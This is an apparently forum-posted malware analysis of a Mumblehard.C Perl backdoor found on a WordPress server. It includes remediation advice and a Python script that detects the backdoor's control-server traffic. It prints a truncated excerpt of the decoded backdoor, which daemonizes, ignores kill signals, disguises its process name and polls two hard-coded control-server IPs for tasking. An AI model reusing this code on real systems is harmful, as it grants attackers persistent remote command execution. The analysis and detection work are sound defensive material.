Bitcoin mining attack
This appears to be the payload from the Mumblehard.C backdoor. This file allows arbitrary code execution from the control servers listed in the file and would be able to execute with the permissions of the www-data user.
I would certainly back up your data and reinstall; however, the scope of this backdoor should only be the www-data user, and it was likely due to an out-of-date WordPress installation.
It's intentionally making it hard to kill. You can instead kill all processes running under the www-data user if you need to try to mitigate it while the system is still running.
The file in /var/tmp is a Perl script that encodes another Perl script using uuencode format. You didn't include the whole thing, but here's what it looks like as plain text so far:
    #!/usr/bin/perl -w
    use strict;
    use POSIX;
    use IO::Socket;
    use IO::Select;
    $0 = "mail"; $| = 1; &main();
    sub main
    {
        exit 0 unless defined (my $pid = fork);
        exit 0 if $pid;
        POSIX::setsid();
        $SIG{$_} = "IGNORE" for (qw (HUP INT ILL FPE QUIT ABRT USR1 SEGV USR2 PIPE ALRM TERM CHLD));
        umask 0;
        chdir "/";
        open (STDIN, "</dev/null");
        open (STDOUT, ">/dev/null");
        open (STDERR, ">&STDOUT");
        my $url = ["77.72.83.137","93.88.74.243"];
        my $rnd = ["a".."z", "A".."Z"]; $rnd = join ("", @$rnd[map {rand @$rnd}(1..(6 + int rand 5))]);
        my $dir = "/var/tmp"; if (open (F, ">", "/tmp/$rnd")) { close F; unlink "/tmp/$rnd"; $dir ="/tmp"; }
        my ($header, $content);
        my ($link, $file, $id, $command, $timeout) = ("en.wikipedia.org", "index.html", 1, 96, 10);
        foreach my $rs (@$url)
        {
            $header = "$dir/" . time; $content = $header . "1";
            unlink $header if -f $header; unlink $content if -f $content;
            &http($rs, $timeout, $header, $content, 0);
            if (open (F, "<", $header))
            {
                flock F, 1;
                my ($test, $task) = (0, "");
                while (<F>)
                {
                    s/^\s*([^\s]?.*)$/$1/;
                    s/^(.*[^\s])\s*$/$1/;
                    next unless length $_;
                    $test ++ if $_ eq "HTTP/1.0 200 OK" || $_ eq "Connection: close"; $task = $1 if /^Set-Cookie: PHPSESSID=([^;]+)/;
                }
                close F;
                ($link, $file, $id, $command, $timeout) = &decxd($task) if $test == 2 && length $task;
            }
            unlink $header if -f $header; unlink $content if -f $conten
This appears to closely parallel the code from here:
http://hardwarefetish.com/681-mumblehard-c-trojan-unpacked
Where 77.72.83.137 and 93.88.74.243 are the control servers. Both these IPs are registered in Russia and are for VPSs. One of the IPs is listed for spam activity:
https://mxtoolbox.com/SuperTool.aspx?action=blacklist%3a93.88.74.243&run=toolpage
As these IPs get indexed in search engines, expect the attacker to disable them automatically. Although I doubt it much matters, since the VPSs aren't going to help you out legally anyway.
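
The header check in the decoded script above (two exact status lines plus a `PHPSESSID` cookie carrying the task) can be reused as a detection rule over proxy or packet-capture exports. This is an added example, not part of the original answer or of the malware; the record format (destination IP plus raw response headers) and the function names are assumptions.

```python
import re

# Control-server addresses taken from the $url list in the decoded script.
C2_ADDRESSES = {"77.72.83.137", "93.88.74.243"}
COOKIE_RE = re.compile(r"^Set-Cookie: PHPSESSID=([^;]+)")


def tasking_cookie(raw_headers):
    """Return the PHPSESSID value if the script would accept these headers.

    Mirrors the loop in the decoded script: each line is trimmed, lines equal
    to "HTTP/1.0 200 OK" or "Connection: close" are counted, and a task is
    accepted only when the count is exactly 2 and the cookie is non-empty.
    """
    hits, task = 0, ""
    for line in raw_headers.splitlines():
        line = line.strip()
        if not line:
            continue
        if line in ("HTTP/1.0 200 OK", "Connection: close"):
            hits += 1
        match = COOKIE_RE.match(line)
        if match:
            task = match.group(1)
    return task if hits == 2 and task else None


def triage(records):
    """Classify (dst_ip, raw_response_headers) pairs from a proxy/pcap export.

    Returns (dst_ip, reason) findings. A header-only match on an unknown
    address is low confidence: ordinary PHP sites can produce it too.
    """
    findings = []
    for dst_ip, headers in records:
        cookie = tasking_cookie(headers)
        if dst_ip in C2_ADDRESSES and cookie:
            findings.append((dst_ip, "known C2 returned a task cookie"))
        elif dst_ip in C2_ADDRESSES:
            findings.append((dst_ip, "contact with known C2"))
        elif cookie:
            findings.append((dst_ip, "header pattern only (low confidence)"))
    return findings
```

Run it over outbound HTTP from the web server only; connections made by the www-data user to either listed address are worth investigating even when no task cookie is present.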